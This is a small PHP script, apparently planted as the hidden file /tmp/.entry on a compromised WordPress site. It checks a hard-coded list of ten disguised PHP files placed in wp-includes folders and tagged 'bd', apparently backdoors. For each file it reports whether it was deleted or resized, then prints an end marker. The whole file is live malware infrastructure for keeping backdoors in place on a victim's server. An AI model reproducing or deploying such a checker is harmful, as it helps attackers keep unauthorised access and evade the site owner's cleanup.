File: //tmp/.entry
<?php $r = '/home/vitanhod/public_html'; $x = ["/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/var_export.php"=>"bd@@1314741@@1025",
"/wp-includes/sodium_compat/src/Core32/Curve25519/default_comments.php"=>"bd@@1314753@@841",
"/wp-includes/sodium_compat/src/Core/Base64/avatars.php"=>"bd@@1314754@@935",
"/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Xml.php"=>"bd@@1312458@@965",
"/wp-includes/js/dist/script-modules/block-library/search/shCache.php"=>"bd@@1314763@@923",
"/wp-includes/sodium_compat/src/Core/Poly1305/gacl.php"=>"bd@@1312460@@924",
"/wp-includes/js/tinymce/plugins/wpeditimage/insertar.php"=>"bd@@1314765@@946",
"/wp-includes/sodium_compat/src/Core32/search_links.php"=>"bd@@1312462@@936",
"/wp-includes/sitemaps/providers/class.wp.sitemaps.taxonomies.php"=>"bd@@1312463@@902",
"/wp-includes/blocks/query/view.min.php"=>"bd@@1312464@@956"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');